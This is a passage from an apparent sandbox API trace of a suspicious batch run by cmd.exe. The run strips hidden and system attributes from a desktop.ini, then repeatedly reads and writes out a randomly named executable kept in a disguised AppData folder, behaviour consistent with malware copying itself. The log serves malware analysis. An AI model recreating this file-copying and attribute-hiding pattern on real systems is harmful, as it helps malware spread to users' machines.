returned 1 [0225.129] GetEnvironmentStringsW () returned 0x2f0458* [0225.129] FreeEnvironmentStringsW (penv=0x2f0458) returned 1 [0225.129] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.130] GetConsoleOutputCP () returned 0x1b5 [0225.130] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.130] GetUserDefaultLCID () returned 0x409 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fc90, cchData=128 | out: lpLCData="0") returned 2 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fc90, cchData=128 | out: lpLCData="0") returned 2 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fc90, cchData=128 | out: lpLCData="1") returned 2 [0225.130] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, 
lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.131] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.131] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.132] GetConsoleTitleW (in: lpConsoleTitle=0x2e0a98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.132] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.132] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.132] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.132] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.133] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0225.133] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0225.133] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0225.133] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0225.133] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0225.133] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0225.133] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0225.135] _wcsicmp (_String1="del", _String2=")") returned 59 [0225.135] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0225.135] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0225.135] _wcsicmp (_String1="IF", _String2="del") returned 5 [0225.135] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0225.135] _wcsicmp (_String1="REM", _String2="del") returned 14 [0225.135] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0225.137] _wcsicmp (_String1="type", _String2=")") returned 75 [0225.137] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0225.137] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0225.137] _wcsicmp (_String1="IF", _String2="type") returned -11 [0225.137] _wcsicmp 
(_String1="IF/?", _String2="type") returned -11 [0225.137] _wcsicmp (_String1="REM", _String2="type") returned -2 [0225.137] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0225.393] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.393] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0225.399] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.400] FindClose (in: hFindFile=0x2f0638 | out: hFindFile=0x2f0638) returned 1 [0225.400] FindClose (in: hFindFile=0x2f0638 | out: hFindFile=0x2f0638) returned 1 [0225.400] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0225.400] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0225.400] GetConsoleTitleW (in: lpConsoleTitle=0x22f6b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.400] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f540, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f608 | out: lpAttributeList=0x22f540, lpSize=0x22f608) returned 1 [0225.400] UpdateProcThreadAttribute (in: lpAttributeList=0x22f540, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f600, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f540, lpPreviousValue=0x0) returned 1 [0225.400] GetStartupInfoW (in: lpStartupInfo=0x22f4fc | out: lpStartupInfo=0x22f4fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0225.400] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") 
returned -1 [0225.401] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f59c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f5e8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", lpProcessInformation=0x22f5e8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdb4, dwThreadId=0xbf4)) returned 1 [0225.458] CloseHandle (hObject=0x4c) returned 1 [0225.458] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0225.459] GetEnvironmentStringsW () returned 0x2f0878* [0225.459] FreeEnvironmentStringsW (penv=0x2f0878) returned 1 [0225.459] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0225.784] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22f4dc | out: lpExitCode=0x22f4dc*=0x0) returned 1 [0225.784] CloseHandle (hObject=0x50) returned 1 [0225.784] _vsnwprintf (in: _Buffer=0x22f624, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f4e8 | out: _Buffer="00000000") returned 8 [0225.784] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0225.784] GetEnvironmentStringsW () returned 0x2f2598* [0225.784] FreeEnvironmentStringsW (penv=0x2f2598) returned 1 [0225.784] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0225.785] GetEnvironmentStringsW () returned 0x2f2598* [0225.785] FreeEnvironmentStringsW (penv=0x2f2598) returned 1 [0225.785] 
DeleteProcThreadAttributeList (in: lpAttributeList=0x22f540 | out: lpAttributeList=0x22f540) [0225.785] GetConsoleTitleW (in: lpConsoleTitle=0x22f8c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\desktop.ini")) returned 0xffffffff [0225.785] GetLastError () returned 0x2 [0225.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y")) returned 0x10 [0225.785] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0225.785] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0225.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\desktop.ini")) returned 0xffffffff [0225.786] GetLastError () returned 0x2 [0225.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22f36c | out: lpConsoleScreenBufferInfo=0x22f36c) returned 1 [0225.786] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0225.788] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0225.788] GetConsoleTitleW (in: lpConsoleTitle=0x22f85c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.789] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0225.789] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.790] _get_osfhandle (_FileHandle=1) returned 0x50 
[0225.790] GetFileType (hFile=0x50) returned 0x1 [0225.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.790] GetFileType (hFile=0x50) returned 0x1 [0225.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.790] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) 
returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.792] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.792] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.793] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.793] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType 
(hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.794] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.794] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.794] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, 
lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.795] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.795] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 
[0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, 